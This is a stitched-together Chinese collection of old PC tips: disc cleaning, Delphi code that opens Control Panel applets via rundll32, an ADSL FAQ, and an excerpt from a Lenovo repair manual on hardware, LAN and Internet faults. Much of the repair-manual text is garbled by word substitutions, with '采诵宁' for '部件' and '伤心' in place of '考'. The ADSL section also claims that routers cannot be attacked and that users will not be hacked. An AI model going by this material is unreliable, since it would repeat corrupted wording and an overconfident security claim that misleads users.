刻录用的光盘片、对拷用的光碟清洁也很重要，选购相机用的喷气毛刷先在表面喷一下，再轻轻的用刷子掸去上面的纤维，如果有指纹等渍物，那是一定要用不织布擦拭掉的。没有刻录过的空片，则需要小心保存，刮伤、变形可都是刻录的大忌呢！

最後，祝你早日摆脱刻坏片的阴影


控制面板大全

《一键清理系统垃圾》

控制面板大全

    在程序运行过程中启动控制面板的各个设置功能：
var x:cardinal;
begin
{启动控制面板}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL',9);
{辅助选项 属性-键盘}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1',9);
{辅助选项 属性-声音}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2',9);
{辅助选项 属性-显示}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3',9);
{辅助选项 属性-鼠标}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4',9);
{辅助选项 属性-常规}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5',9);
{添加/删除程序 属性-安装/卸载}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Appwiz.cpl,,1',9);
{添加/删除程序 属性-Windows安装程序}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Appwiz.cpl,,2',9);
{添加/删除程序 属性-启动盘}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Appwiz.cpl,,3',9);
{显示 属性-背景}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0',9);
{显示 属性-屏幕保护程序}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1',9);
{显示 属性-外观}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2',9);
{显示 属性-设置}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3',9);
{Internet 属性-常规}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,0',9);
{Internet 属性-安全}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,1',9);
{Internet 属性-内容}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,2',9);
{Internet 属性-连接}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,3',9);
{Internet 属性-程序}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,4',9);
{Internet 属性-高级}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Inetcpl.cpl,,5',9);
{区域设置 属性-区域设置}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,0',9);
{区域设置 属性-数字}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,1',9);
{区域设置 属性-货币}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,2',9);
{区域设置 属性-时间}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,3',9);
{区域设置 属性-日期}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Intl.cpl,,4',9);
{游戏控制器-一般}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Joy.cpl,,0',9);
{游戏控制器-高级}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Joy.cpl,,1',9);
{鼠标 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Main.cpl',9);
{多媒体 属性-音频}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,0',9);
{多媒体 属性-视频}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,1',9);
{多媒体 属性-MIDI}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,2',9);
{多媒体 属性-CD音乐}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,3',9);
{多媒体 属性-设备}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Mmsys.cpl,,4',9);
{调制解调器 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Modem.cpl',9);
{网络}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Netcpl.cpl',9);
{密码 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Password.cpl',9);
{扫描仪与数字相机 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Sticpl.cpl',9);
{系统 属性-常规}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,0',9);
{系统 属性-设备管理器}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,1',9);
{系统 属性-硬件配置文件}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,2',9);
{系统 属性-性能}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Sysdm.cpl,,3',9);
{日期/时间 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL timedate.cpl',9);
{电源管理 属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Powercfg.cpl',9);
{拨号属性}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL Telephon.cpl',9);

将图表变为真彩色
HKEY——CURRENT——USER
Control Panel
Control Panel
windowmetrics　　新建字符串值 SHELL ICON BPP “16”


宽带安装和使用问题集粹

《一键清理系统垃圾》

宽带安装和使用问题集粹

    ADSL（Asymmetrical Digital Subscriber Loop非对称数字用户线环路）是xDSL家族成员中的一员，被欧美等发达国家誉为“现代信息高速公路上的快车”。它因其下行速率高、频带宽、性能优等特点而深受广大用户的喜爱，成为继MODEM、ISDN之后的又一种全新更快捷、更高效的接入方式，也是目前国内使用最多的接入方式。

    ADSLL使用中的异常故障

    在宽带网络的使用过程中，经常会遇到一些棘手的问题，导致不能正常上网，影响工作、学习以及娱乐。下面就ADSL宽带使用过程中常见的一些问题，提供一些参考的解决方法。

    1．使用USB接口的ADSL MODEM时候，拨号无法接通的问题。

    现象和原因分析：一般来说，出现这种情况是由于USB MODEM是通过USB接口供电，刚启动时间比较短，网络设备没有被激活或者线路没有被激活的原因，即ADSL MODEM没有被激活而导致线路不通。

    解决办法：出现了类似问题，我们可以耐心地等待30秒至几分钟，再尝试连接，有时候一开机就可以连上，而有的时候要激活几分钟或者重新启动才可能连上；如果线路一直不能激活的话，则可能网络连线出现了问题，请及时电话咨询当地电信局，这种情况相对发生较少。

    2．一直使用良好的ADSL MODEM，突然无法上网的问题。

    现象和原因分析：出现这样的问题，可能的原因很多，如果排除硬件损坏和线路损坏的话（这个情况出现的机率很小），主要可能有如下原因：第一，网络设备过热而出现工作不稳定的情况；第二，IP调整过程中的自动断线；第三，电信局网络系统崩溃，这种情况出现的机率也很小，不过笔者就遇到过两次。

    解决办法：如果是网络设备过热出现工作不稳定的情况，一般来说这样的情况设备马上可以自动连接上；由于ADSL MODEM的发热量还是比较大，手摸上去就很烫，为了设备稳定地工作，还是将其放置在通风比较好的地方。由于ADSL的IP地址是动态分配的，因此刚好有时候其IP要调整，就会出现突然掉线的情况，这种情况一般不需要在意，几秒钟之后就可以自动连接上，如果连不上，按一下RESET IO键关闭，然后再启动，就可以连接上了。如果以上都不能解决问题，可以电话咨询你的ISP，确定一下是否是网络中心出现了问题。
    3．网速很慢的问题

    一般来说，1MB的ADSL宽带的速度对于我们日常的使用（高清晰的视频点播除外）或者几个人的使用来说，应该足够了，但是有时候打开网页都很慢。

    现象和原因分析：第一可能是个别WEB服务器繁忙，如果打开其他的网页不慢的话，则网络应该没有问题，是由于个别WEB服务器比较忙而导致的网速很慢。其次，可能是拨号软件和操作系统之间的兼容性问题。再次，还有可能就是线路质量或者是距离问题，因为ADSL使用的是电话线，如果距离过长就会出现信号衰减而导致网速减慢。

    解决办法：个别WEB服务器繁忙则不是我们能够解决的，建议您稍后再试几次。在使用拨号软件方面，如果您使用Windows XP操作系统，则系统自带拨号工具，不需要另外的拨号软件，如果使用其他系统，则建议您使用RASPPPOE拨号软件。如果是线路质量或者距离原因的，请您和相关电信局（为您上门安装、调试ADSL的区局，安装时留有联系方式）联系。

    ADSL宽带共享问题

    1．有的朋友使用了以太网接口的ADSL MODEM上网，然后通过HUB或者交换机，几台机器组建局域网，然后共享上网的解决方案。

    下面以使用实达ADSL2110-EH MODEM（带路由功能）为例子介绍一下有关的设置。一般使用MODEM的默认的IP：192.168.10.1，则作为客户端（每台连接到HUB或者交换机的机器）机器保证网卡与HUB或者交换机连接好后，需要安装TCP/IP协议以及局域网的IPX/SPX协议，然后需要设置IP地址192.168.10.X，跟MODEM所在的域一样，子网掩码255.255.255.0，默认网关：192.168.10.1（MODEM的IP地址），而DNS服务器则设置成当地电信网络的IP地址。其他选择项目默认就可以了。

    如果使用的是实达5800U以及类似的不带路由功能的USB接口ADSL MODEM，其实同样可以共享上网。其中一台与ADSL MODEM连接的机器做主机，并和其他机器一样，通过网线连接到HUB或者交换机上。其中主机上，设置IP地址192.168.0.1，子网掩码255.255.255.0，默认网关：192.168.0.1，而DNS服务器则设置成当地电信网络的IP地址，同时选择通过局域网共享ADSL，并且在主机上不能打开WIN XP自带的防火墙，否则将不能上网。作为客户端，则只需要选择通过局域网上网就可以了，如果是WINXP的系统，基本不要设置就可以上网了，这种方法主要是的弊端是作服务器的机器的性能要好一些，而且一旦服务器关机，其他用户就不能上网了。

    2．多台计算机共享上网后，网速为何变慢？

    共享上网的速度主要取决于使用的上网方式以及网络带宽，目前一般常用的ADSL速度主要有512KBPS、1MB、2MB，Cable MODEM和小区宽带带宽甚至为10M，但是其实际的速度往往取决于供应商的服务质量，有时候并不能达到所标称的速度。一般来说，1M带宽的网络可以供1-12个人上网浏览、聊天和收发电子邮件等日常使用都没有问题，所有的用户共同分享1M的带宽，但是带宽并不是平均分配给每台计算机，如果其中的一台或者几台机器同时使用多线程的下载工具下载文件或者玩一些占用带宽较厉害的网络游戏，那么就会大量占用带宽，造成其他计算机网速太慢，甚至无法浏览网页。如果经常出现类似情况，可以建议网内用户使用单线程下载或者选择上网密度不大的时间下载。
    3．两台电脑原来是使用网卡互联，后来把其中的一台电脑的网卡连接到宽带上，有哪些方法可以让另一台电脑也能连接到宽带上？

    解决共享上网问题，主要有三种方法：使用HUB或者交换机，将宽带网接线直接连接到HUB或者交换机上，然后通过两台电脑的网卡分别同HUB或者交换机相连，就可以通过共享软件来共享宽带了；其次，在已经连接宽带的机器上再安装一片网卡，将另外一台电脑的网卡与之相连，通过网络共享软件来共享上网；再次，如果您资金相对充裕的话可以选择一台宽带路由器，将网通宽带的网线接在路由器的WAN端口，再将两台电脑网卡与路由器的LAN端口相连接，配置好路由器的PPPOE拨号功能就可以让任意一台电脑独立上网了。

    4．宽带上网网络安全如何保证？

    很多朋友都担心自己共享宽带上网，自己的机器会被“黑”，其实一般来说，现在的共享软件的功能已经比较强大了，一般都具有防火墙的功能，当外界使用连接局域网时候，由于局域网对外只有1个合法的IP地址，外界即使连接上，也只连接到了共享的那台服务器。内部其他的计算机是无法访问的，也就不能被侵入，因此，和各台计算机独立上网相比，共享上网大大提高了计算机的安全性，另外，许多宽带的路由器也具有防火墙的功能，那么外界连接也就是路由器本身，绝大多数黑客攻击遇到路由器后就无法再起作用了，因此安全性更高，因为路由器本身是不怕攻击的。因此，大家尽管放心，一般你是不会被“黑”到的！

    5．家里有两台计算机共享宽带上网，但是安装网卡比较麻烦，还有什么简单方法？

    现在的选择其实有很多，比较常见的是选择USB Link联机将两台计算机互联，然后再共享上网。不过需要注意的是USB Link联机线有两类：一类是仅提供了最简单的文件传输功能，而且需要借助专门的软件来实现，这种线是无法实现共享网络的；另外有一种USB联机线集成了专门的控制芯片，安装过后在硬件列表中会虚拟为网络适配器，在使用和配置上基本跟网卡一样，可以实现共享上网，不过跟网线比起来就是其连接距离比较短，而且价格要贵一些。此外，您还可以通过无线上网的方式，虽然方便，不过无线设备的价格也比较昂贵。

作者：DIY
来源：中国计算机报


来自联想维修站的内部发行资料2

《一键清理系统垃圾》

来自联想维修站的内部发行资料2

3) 硬件设备安装：
A. 冲突检查：
a) 所安装的设备、采诵宁是否在系统启动前的自检过程中识别到，或能由操作系统识别到（非即插即用识备除外）。如果不能识别，应检查BIOS设置及设备本身，包括跳线及相应的插槽或端口；
检查新安装的设备与原系统中的设备是否有冲突；通过改变驱动的安装顺序、去除原系统中的相应采诵宁或设备、更换插槽，看故障是否消除。如果不能消除，则为不兼容；
c) 加装的设备是否与现有系统的技术规格或物理规格匹配；
d) 检查当前系统中的一些设置（主要是.ini文件中的设置）是否与所安装的采诵宁或设备驱动有不匹配的地方；
B. 驱动程序检查：所安装的设备驱动是否为合适的版本（即，不一定是最新的）；
C. 硬件检查：
a) 所安装的采诵宁或设备是否本身就有故障；
检查原系统中的采诵宁是否有不良的现象（如插槽损坏、供电能力不足等）。
   五、本类故障的判断流程
见附录一之（五）。
六、案例
案例一：
问题描述：用户报修天禧6620机器，在安装98过程中，提示剩余三分钟时。Hwinfo报错，无法正常安装。
解决方案：工程师上门后，经过检测，确实存在用户反应的问题。然后尝试将安装文件拷贝到硬盘上安装和换一张安装盘安装，故障依旧。接着检查BIOS发现，系统日期是2075年。将日期改回后，故障排除。问题虽小，影响却大。在此，提醒各位同仁，做事要细心，不要忽略每个细节。
案例二：
问题描述：逐日2000机器，一次突然死机，不能启动，重装系统能成功，但在设备管理里有很多问号，如打印口，COM口等都没有驱动。
解决方案：在站内又重装系统，驱动主板不能解决问题，看来只有更换主机才行了。打开机箱，发现有很多灰尘，取出主板，进行大扫除，抱着试一试的心里，重装一切OK。

案例三：
问题描述：一用户奔月4000机器/PIII 1G，他是单位技术员，说此机不能重装系统，每次重装都死机，要求上门维修。
解决方案：到达用户处，发现重装到检测硬件时无反应，打开机器进行检查时，发现CPU风扇不是联想。客户说这是刚从市场上拿来的，新的，应没有问题。依次替代硬盘与内存没有用，经用户同意带回站内烤机，再换下主板与CPU还是不行，后经多次重试发现每次死时间越来越短，怀疑还是CPU风扇有问题。换其它联想机器上的风扇竟解决问题。引起故障原因是客户的CPU风扇转速不够，引起温度过高死机
   第六章 操作与应用类故障
一、定义举例
这类故障主要是指启动完毕后到关机前所发生的应用方面及系统方面的故障。
二、可能的故障现象
1、 休眠后无法正常唤醒；
2、 系统运行中出现蓝屏、死机、非法操作等故障现象；
3、 系统运行速度慢；
4、 运行某应用程序，导致硬件功能失效；
5、 游戏无法正常运行；
6、 应用程序不能正常使用。
三、可能涉及的采诵宁
主板、CPU、内存、电源、磁盘、键盘、接插的板卡等
四、判断要点/顺序
1、 维修前的准备
1) 干净的可用硬盘；
2) 杀毒软件；
3) 尽可能新的驱动程序、若干版本的BIOS；
4) 磁盘连接的数据线等。
2、 环境检查
1) 市电及连接检查：
A. 检查市电是否正常，连接是否牵伤心；是否有接地；
B. 设备间的连接线是否接错或漏接。
2) 周边及外观检查：
A. 检查与主机连接的其他外设工作是否正常；
B. 驱动器工作时是否有异响，CPU风扇的转速是否过慢或不稳定；
C. 观察机箱内灰尘是否太多，而导致各插接件间接触不良。先除尘后可用橡皮等擦拭金手指，去除氧化层或灰尘。然后重新插上；
D. 观察系统是否有异味，元器件的温升是否过高或过快。
3) 显示与设置检查：
A. 详细记录报错信息，判断可能造成故障的部位；
B. 注意CMOS中对于硬盘、系统时间、CPU温度的设置，注意在自检时显示的硬件信息和机器配置是否相符；
C. 仔细阅读软件的使用指南，注意软件运行的环境要求。
4) 充分与用户沟通：
A. 了解用户的使用情况；
B. 出故障前的现象；
C. 做过什么操作才出现目前的故障。
根据以上了解的情况，来初步判断可能的故障原因。
3、 故障判断要点
1） 检查是否由于用户误操作引起
A. 机器出现死机、蓝屏或无故重启时，首先要伤心虑到用户的操作是否符合操作规范和要求，要仔细询问、观察用户的操作方法是否符合常理，并由工程师用正确的方法操作、应用用户的机器，查看是否出现用户所报修的故障。若不出现，则可认为是用户操作不当引起的，由工程师向用户解释并演示正确的操作方法。
B. 若经过上述操作故障依然存在，可用系统文件检查器检查用户的机器系统是否有丢失的DLL文件，并尝试恢复。
C. 注意观察用户的机器在死机、蓝屏或无故重启时有没有规律，并找出可能引起机器故障的原因（如机器在运行某一程序时或机器开机在一定时间内死机）。
D. 通过与另一台软硬件相同且无故障的机器进行比较，查看故障机的文件大小是否相同或相差不大，主程序的版本是否一致。
2） 检查是否由于病毒或防病毒程序引起故障
A. 检查用户的机器是否被病毒感染，使用杀毒软件杀毒；
B. 检查用户是否安装了两个或两个以上的防毒软件，建议用户使用其中一个，并卸载其他的防毒软件；
C. 检查是否有木马程序，用最新版的杀毒程序可以查出木马程序。可以通过安装补丁来弥补程序中的安全漏洞，或者安装防火墙。
3） 检查是否由于操作系统问题引起故障
A. 检查硬盘是否有足够的剩余空间，并检查临时文件是否太多。整理硬盘空间，删除不需要的文件；
B. 对于系统文件损坏或丢失，可以使用系统文件检查器进行检查和修复；
C. 检查操作系统是否安装了合适的系统补丁（对于Winnt可在启动时观察service pack的版本，推荐使用SP6；Win2k和Winxp可以在系统属性中查看，Win2k推荐使用SP3，Winxp推荐使用SP1。）；
D. 检查DirectX驱动是否正常，升级DirectX的版本；
E. 检查是否正确安装了设备的驱动程序，并且驱动的版本是否合适。检查驱动安装的顺序是否正确（例如：首先安装主板驱动）。
4） 检查是否由软件冲突、兼容引起故障
A. 检查用户应用软件的运行环境是否与现有的操作系统（NT/98/2K/XP）相兼容，可通过查看软件说明书或到应用软件网页上查找相关资料，并查看网页上有没有对于此软件的升级程序或补丁可安装。
B. 可用任务管理器观察故障机器的后台是否有不正常的程序在运行，并尝试关闭程序只保留最基本的后台程序。
C. 注意查看故障机内是否有共用的DLL文件，可通过改变安装顺序或安装目录来解决问题。
5） 检查硬件设置是否不正确
A. 首先，检查CMOS设置是否正确，可恢复默认值；
B. 在设备管理器中检查硬件是否正常，中断是否有冲突，如有冲突，调整系统资源（对于某些硬件，要阅读说明书，按照说明正确设置硬件）；
C. 在设备管理器中将硬件驱动删除，重新安装驱动程序（最好安装版本正确的驱动程序），查看硬件驱动是否恢复正常；
D. 运行硬件检测程序，如AMI等检测硬件是否有故障；
E. 在软件最小系统情况下， 重新更新硬件驱动，观察故障是否消失。
6） 检查是否为兼容问题
A. 遇到兼容性问题时，应检查硬件的规格和标准（如同时使用多条内存时检查内存是否为同一厂家、同一规格、同一容量、内存颗粒同一批次），是否允许在一起使用。
B. 阅读说明书或到网页上查找相关资料，检查用户的硬件正常使用所需的软件要求，现在的软件环境是否符合要求，软硬件之间是否相互支持。
C. 在设备管理器中检查用户的系统资源是否有冲突，如有冲突，手动调整系统源。
D. 在设备管理器中检查用户机器的硬件的驱动是否安装正确，更新合适版本的设备驱动（如某些显卡用WIN2000或WINXP自带的公版驱动，会造成某些大型3D游戏无法运行）；
E. 检查维修BOM，去除非联想的硬件，检查系统是否可正常工作，如可正常工作，建议用户更换自行添加的硬件或查找硬件相关资料进行解决。
7） 检查是否由于网络故障引起
A. 碰到机器连接在网络上，出现死机、运行慢、蓝屏等故障时，应首先关闭网络，与网络环境隔离，观察故障是否消失，如故障消失，则为网络问题引起故障。
B. 确为网络问题引起的故障，其判断与解决步骤参伤心网络部分。
8） 检查是否由于硬件性能不佳或损坏引起
A. 使用相应的硬件检测程序，检查硬件是否有故障，如果有，利用替换法排除相应的硬件；
B. 用替换法检查检测程序无法判断的硬件故障。
第七章 局域网类故障
一、定义举例
这类故障主要涉及局域网宽带网等网络环境中的故障。
二、可能的故障现象
1、 网卡不工作，指示灯状态不正确；
2、 网络连不通或只有几台机器不能上网、能Ping通但不能连网、网络传输速度慢；
3、 数据传输错误、网络应用出错或死机等；
4、 网络工作正常，但某一应用下不能使用网络；
5、 只能看见自己或个别计算机；
6、 无盘站不能上网或启动报错；
7、 网络设备安装异常。
8、 网络时通时不通。
三、可能涉及的采诵宁
网卡、交换机（包括HUB、路由器等）、网线、主板、硬盘、电源等相关采诵宁。
四、判断要点/顺序
1. 维修前的准备
1) 可用的网线（直连线和普通网线，线序符合国际标准）；
2) 如有条件，带上网线连接检查器。
2. 环境检查
1) 电源连接检查：
A. 市电的接线定义是否正确；
B. 是否有地线；
C. 网络上的各设备（如：HUB、交换机等）是否均已上电工作。
2) 网线连接检查：
A. 网线连接线序是否与网络连接的要求匹配（如直连和普通网线）；
B. 网线的连通性是否正常，要查看网线有无破损、过度扭曲；
C. 网线长度是否过长（如5类双绞线长度超过技术规格要求的100米）；
D. 网线接头--水晶头是否完好、是否氧化；
E. 网卡接口是否完好。重新插拨网线检查网线与网卡连接是否松动；
F. 根据电缆要求是否有终结器，终结器是否正常。
3) 网络设备外观及周边检查：
A. 加电启动后，网卡指示灯是否亮等；
B. HUB等设备的网线接口，在与终端或服务器连接后，如果终端或服务器启动及配置正常，其指示灯会亮（注意指示灯颜色是否正常，参伤心设备说明书），如果指示灯不亮，说明设备有故障；
C. 网卡采诵宁是否接插到位无翘起，网卡上金手指是否氧化；
D. 网线或交换机等设备周围是否有干扰。
4) 主机外观检查：
A. 检查机箱内是否有异物造成短路；
B. 机箱内的灰尘是否过多，如果是，应清理灰尘；
C. 主板与网卡上元器件是否有变形、变色现象；
D. 加电后，注意采诵宁、元器件及其它设备是否有异味、温度异常等现象发生。
5) 其它方面：
A. 在UNIX下，要分清是终端死机还是服务器死机
3. 故障判断要点
1) 寻求用户网管的配合。
首先应尽可能与网管联系，以得到网管合作。
2) 网络环境检查：
A. 对于掉线、丢包等故障，要注意检查网卡与交换机间的兼容性；
B. 网络连接正常，但不能进行域登录，要从以下几点检查：
a) 指明的域名是否存在或已工作；
是否已按服务器、操作系统的要求（如在服务器端启用了WINS解析服务、DNS服务等，WINXP HOME版不能登录到域中。），设置终端允许登录到域中，计算机名是否已注册到域中；
c) 检查使用的协议是否正确；
C. 检查是否安装了防火墙，是否被授权访问；
D. 在必要时，使用直连线只连接两台机器在对等网环境下检查是否可连网（这样做可排除网络上诸环境因素的影响）。
3) 网络适配器驱动与属性检查：
A. 驱动程序是否正确、合适。网卡设备建议由系统自动识别，并尽可能使用与操作系统匹配和更新的驱动程序（只有老型号的ISA网卡才可使用手动安装的方法进行驱动的安装）。在安装驱动程序时，如有必要，可将启动中加载的和正在运行的程序关掉，再行安装；
B. 网卡在某一网络环境下工作不正常，可调整网速，如对于10/100Mbps的网卡，如果工作在10Mbps的网络环境下，网络工作不正常，应特别指定网卡工作在10Mbps的速度上；
C. 检查网络通信方式，如是否为全双工等。
4) 网络协议检查：
A. 检查网络中的协议等项设置是否正确（不管用哪种协议，必须保证网内的机器使用的协议一致）。网络中是否有重名的计算机名；
B. 如果不能看到自己或其它计算机，先通过按F5多刷新几次来检查，然后检查是否安装并启用了文件和打印共享服务、是否添加了NETBEUI协议（如果网络环境中有WINS服务器，则不需添加，如没有则要添加）；
C. 如能ping通网络，但不能在网上邻居中访问其它终端或服务器，可用ipconfig /all（在命令行方式）、netstat等命令查看具体信息，检查网络属性的设置，如域、工作组等，并进行相应的更改；
D. TCP/IP协议的实用程序ping命令，可用来检查网络的工作情况。这需要维修人员了解TCP/IP协议的相关知识（顺序：PING 127.0.0.1，本机IP、本网段IP、网关、DNS等）；
E. 如果PING不通，可尝试在网络属性中把所有的适配器和协议删除，重启后重新安装；
F. 通过执行tracert <目标IP地址 >命令,检查IP包在哪个网段出错；
5) 系统设置与应用检查：
A. 检查机器自检完成后，所列的资源清单中网卡是否被列其中（非PNP网卡除外），其所用资源与其它设备有无共享；
B. 检查系统中是否有与网卡所用资源相冲突的其它设备，如有，可通过更换设备间的安装位置，或手动操作更改冲突的资源。对于ISA总线的网卡，可能需要在CMOS中关掉其所占中断的PnP属性，且其所用资源一般不宜与其它设备共享。较老的PCI设备也不宜与其它设备共享资源；
C. 检查系统中是否存在病毒；
D. 如果某一特定的应用在使用网络时工作不正常，检查CMOS设置是否正确，重点检查网卡的驱动程序是否与其匹配，必要时，关闭其它正在运行的应用程序，及启动中加载的程序，看是否能正常工作，或与能够正常运行该应用的机器进行比较，检查在配置方面有何不同；
E. 通过重新安装系统，检查是否由于系统原因而导致网络工作不正常。
6) 硬件检查：
A. 用网卡自带程序和网卡短路环检测网卡是否完好；
B. 如更换网卡后仍不正常，可更换主板，更换主板仍不能解决时，可伤心虑更换其它型号网卡；
7) 对于无盘站，注意检查以下几点：
A. BIOS中是否允许了从网络启动，BIOS中最好禁用软驱，将Report No FDD For Win 95，由Yes更改为No（或反之。这与软驱的设置有关）
B. 对于ISA网卡，其BIOS的设置，应使BOOT ROM默认的起始地址为D800H 或C800H，I/O为300H（如有些网卡的默认设置为C800H容易与AGP显卡等采诵宁占用的地址资源冲突导致安装失败）。；
C. 在以上操作无效时，对有些主板，屏蔽板载声卡，再根据需要进行相应的修改。
D. 工作站的协议必须与服务器协议一致；
E. 有多台服务器时，必须指定第一响应服务器。
对于无线网络，特别要注意：
A. 检查两台终端间的有效距离是否过大，中间是否有隔离物；
B. 对等网络下，所使用的频率通道是否一致；
C. 在用AP的环境下，终端的网络ESSID必须与AP一致；
D. 检查网卡和AP的密钥的密钥是否相符。
五、本类故障的判断流程
见附录一之（七）。
六、案例
案例一：
问题描述：网卡不工作，指示灯状态不正确；
解决方案：首先观察系统设备管理器中有没有网卡这个设备，若没有则更换网卡或重新插拔网卡测试，并看金手指部分有没有锈迹，若有，则用橡皮擦干净测试。

案例二：
问题描述：局域网内，只有几台机器能连网，大部分不能互访。网卡灯亮，HUB灯闪
解决方案：见到这种情况，要从软硬两个方面来分析，首先：
a、软件方面，使用最新版本的KV3000进行了查、杀病毒工作，没有发现任何病毒，从而排除了病毒干扰的可能性。网络方面，安装了NetBEUI、IPX/SPX和TCP/IP协议，网卡的驱动也正确安装，在设备管理中没有发现任何冲突，并进行了协议绑定。设置了文件、打印机共享，也设定了工作组名称和计算机名称。应该说从网络协议到共享资源设置等均没有问题，可以排除软件方面的错误。
b、从硬件方面分析，大致有四种可能：其一是网线断路，无法形成信号回路；其二是网线的线序是否正确；其三是在集线器与计算机间连接用的网线过长，超过100米；其四集线器端口有问题。针对这四种可能性，逐个进行排除。使用测线工具或万用表测量网线，发现网线连接状况很好，没有断路。通过目测，连接用的网线长度不可能超过100米。将几台网络已连通的计算机接在集线器上的插口换到怀疑损坏的集线器端口上，这几台计算机仍然互通，说明集线器端口没有损坏。
c、通过对网线线序的检查，发现用户的制作的线序是1、2、3、4，问题就出在这儿，因为RJ45插头正确的连接应该是使用1、2、3、6，其中1、2是一对线，3、6是一对线，其余四根线没有定义。查出了问题，只需为用户重新做网线头，插入后网络正常。
案例三：
问题描述：脑在网上邻居中只能看到自己，而看不到其他电脑，从而无法使用其他电脑上的共享资源和共享打印机
解决方案：使用ping命令，ping本地的IP地址或主机名，检查网卡和IP网络协议是否安装完好。如果能ping通，说明该电脑的网卡和网络协议设置都没有问题。问题出在电脑与网络的连接上。因此，应当检查网线和Hub及Hub的接口状态，如果无法ping通，只能说明TCP/IP协议有问题。重新设置网络协议，对于10台以下的机器且不上Internet的机器可伤心虑用NetBEUI协议，若上Intrnet则用TCP/IP协议，不管用哪种协议，必须保证网内的机器使用的协议一样。
   案例四：
问题描述：无盘站不能上网或启动报错；
解决方案：
NOVELL无盘工作站不能正常登录服务器有以下几种情况：
    a．工作站屏幕上出现Error opening boot disk image file ORUnable to open image file
    这可能是连到了一个没有包含远程启动映像文件的服务器。把启动映像文件拷到这个服务器的Login目录下；如果使用的是多远程启动映像文件，检查Bootconf.sys中对工作站是否进行了正确设置，应确保网络地址和节点地址的正确，如果以上都正确，那么可能是远程启动映像文件有问题，可以测试生成启动映像文件的软盘能否正常启动有盘工作站。若还不行，可以运行一下RPLFIX实用程序。
    b．工作站屏幕上出现Error finding server
    在确保硬件线路连接没问题的前提下，检查服务器上是否安装了Ethernet_802.3帧类型，远程启动映像文件的net.cfg 中是否包含Ethernet_802.3，这种就是前面所说的旧型的IPX芯片，它不支持Ethernet－802.2帧。按照相应的帧类型重新制作启动映像文件。
    c．工作站在从远程启动映像文件装入网卡驱动时挂起，屏幕并显示下面类似信息：Ethernet card is improperly install or net connected the network.
    这就是由于前面所说的旧式IPX芯片在Netware 4.X以上使用时，在远程启动映像文件中没有RPLODI.com或远程启动映像文件的批处理文件中ISL.com下行没有RPLODI.com行。
    d．工作站显示Loading MS－DOS并挂起
    这是由于远程启动映像文件使用了DOS 5．0或以上版本，对远程启动映像的文件运行RPLFIX实用程序。
    e．屏幕上出现batch file missing
    出现这个消息是由于autoexec.bat或其它批处理文件（对多个远程启动映像所使用的批处理）没有同时存在于LOGIN目录和用户登录目录。

第八章 Internet类故障
一、定义举例
主要是与浏览Internet有关的软、硬件故障。如：不能拨号、不能浏览网页等。
二、可能的故障现象
1、 不能拨号、无拨号音、拨号有杂音、上网掉线；
2、 上网速度慢、个别网页不能浏览；
3、 上网时死机、蓝屏报错等；
4、 能收邮件但不能发邮件；
5、 网络设备安装异常；
6、 与调制解调器相连的其它通信设备损坏、或反之。
三、可能涉及的采诵宁
调制解调器、电话机、电话线、局端。余类同 局域网类故障。

  四、判断要点/顺序
1、 环境检查
1) 周边及外观检查：
A. 市电的接线定义是否正确，是否有地线；
B. 外置MODEM附近是否有变压器等设备或其它可造成干扰的电器设备；
C. 电话是否有防盗打功能，是否安装了IP电话拨号器、传真机等外部设备。这些外部设备连接是否正确，工作是否正常（单独工作和连机情况下）；
D. 检查机箱内灰尘是否较多，是否有异物造成短路，插接采诵宁是否接插到位，无翘起；
E. 主板、MODEM或宽带上网网卡上元器件是否有变形、变色等现象；
F. 网卡接口接触是否良好；
G. 加电后注意采诵宁、元器件及其它设备是否有异味、温度异常等现象发生。
2) 信号线连接：
